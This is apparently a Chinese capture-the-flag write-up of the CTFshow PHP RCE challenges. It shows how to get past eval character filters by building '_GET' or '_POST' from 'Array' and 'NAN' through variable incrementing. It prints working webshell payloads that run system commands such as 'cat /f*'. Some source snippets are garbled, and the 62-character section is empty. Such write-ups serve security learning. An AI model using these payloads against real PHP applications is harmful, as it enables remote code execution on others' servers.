CTFshow-RCE极限大挑战
前言
ctfshow出的这五道rce感觉挺好玩的,但自己没做出几道来,所以来详细的复现一下,这几道题基本都是利用的自增,但长度逐渐缩短,雀氏极限。
RCE1
源码
分析
可以看到我们最后执行的是eval,而过滤的只有( 和. ,而php eval函数的作用是把字符串按照PHP代码来计算,比如果我们写入 echo `1` 就会写入1 ,如果我们写入的是一句话木马,就可以成功植入木马,执行rce
payload
code=echo `$_POST[1]`;&1=cat /f*
RCE2
\"|`~\\\\]/",$ctfshow)){eval($ctfshow);}else{echo("Are you hacking me AGAIN?");}}else{phpinfo();}
}
?>分析
基本把能用的都过滤了,只剩下$()_+;[],.=/字符,p神的文章好早之前就提出过,自增rce
一些不包含数字和字母的webshell | 离别歌
思路就是,我们rce需要字母,但字母都过滤了,所以我们就要想办法去构造字母,p神是用
强制连接数组和字符串,数组将被转换成字符串,其值为Array,而我们如果取Array的第[0]个字母的话就是A,而A++就是B,例如:
之后我们可以用 . 把字母拼接起来,
payload
注释有分解。
$_=[].''; //得到Array
$_=$_['/'=='+']; //让[]里的值报错返回0,取Array[0]=A,此时$_=A
$____='_'; //让$____=_,后面容易拼接
$__=$_; //将A赋给$__
$__++;$__++;$__++;$__++;$__++;$__++; //A自增到G,此时$__=G
$____.=$__; //将_和G拼接起来,此时$____=_G
$__=$_; //再将$__还原成A
$__++;$__++;$__++;$__++; //A自增到E,此时__=E
$____.=$__; //E和_G拼接,此时$____为_GE
$__=$_; //再将__换源成A
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; //A自增成T此时__=T
$____.=$__; //再拼接成_GET,此时$____=_GET
$_=$____; //为了方便起见,我们把____换成_
($$_[_])($$_[__]); //拼成我们想要的($_GET[_])($_GET[__]),传入_和__命令执行即可 最后换成一行rce即可
RCE3
源码
\"|`~\\\\]/",$ctfshow)){eval($ctfshow);}else{echo("Are you hacking me AGAIN?");}}else{phpinfo();}
}
?>分析
这个过滤和rce2差不多,但吧1和0给放出来了,也限制了长度<=105,可以看一下这个文章
BSides Noida CTF 2021 Web Calculate_bfengj的博客-CSDN博客
得到NAN再用上面相同的方法获得N,从N开始构造的话长度就比上一个方法少多了,原理还是上一题的自增,试着构造一下,当我是想直接$a[0]的时候,他没有回显,原来是因为现在的NAN还不算字符串,所以后面要在拼接一个例如
就可以得到我们想要的N了,但我我们需要字母才能构造N,就用上一题同样的方法构造出A来,因为0可以用了,所以我们就不用让报错直接用[0]就可以了
然后我们就可以得到N了
之后再跟上一步一样一步一步自增就可以了
payload
注释有解析。
$_=([].[])[0]; //得到Array
$_=($_/$_.$_)[0]; //__=N
$_++; //O
$__=$_.$_++; //拼接PO
$_++;$_++;$_++; //S
$__.=$_;
$_++; //T
$_=_.$__.$_; //拼接_和POST
$$_[0]($$_[1]); //$_POST[0]($_POST[1])RCE4,RCE5
之后就是越来越少的长度,就直接分析一下师傅们的pyload
72位
%2b;$_=_.$_.%2b%2b$%ff.%2b%2b$%ff;$$_[%ff]($$_[_]);&%ff=system&_=cat /f*
68位
$_=_(a/a)[_];//N
$a=++$_;//O
$$a[$a=_.++$_.$a[$_++/$_++].++$_.++$_]($$a[_]);//巧妙的把两次$_++放在一起$a=_.++$_.$a[$_++/$_++].++$_.++$_//$a直接拼接出_POST $$a[_POST]($$a[_])//$_POST[_POST]($_POST[_])
62位
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!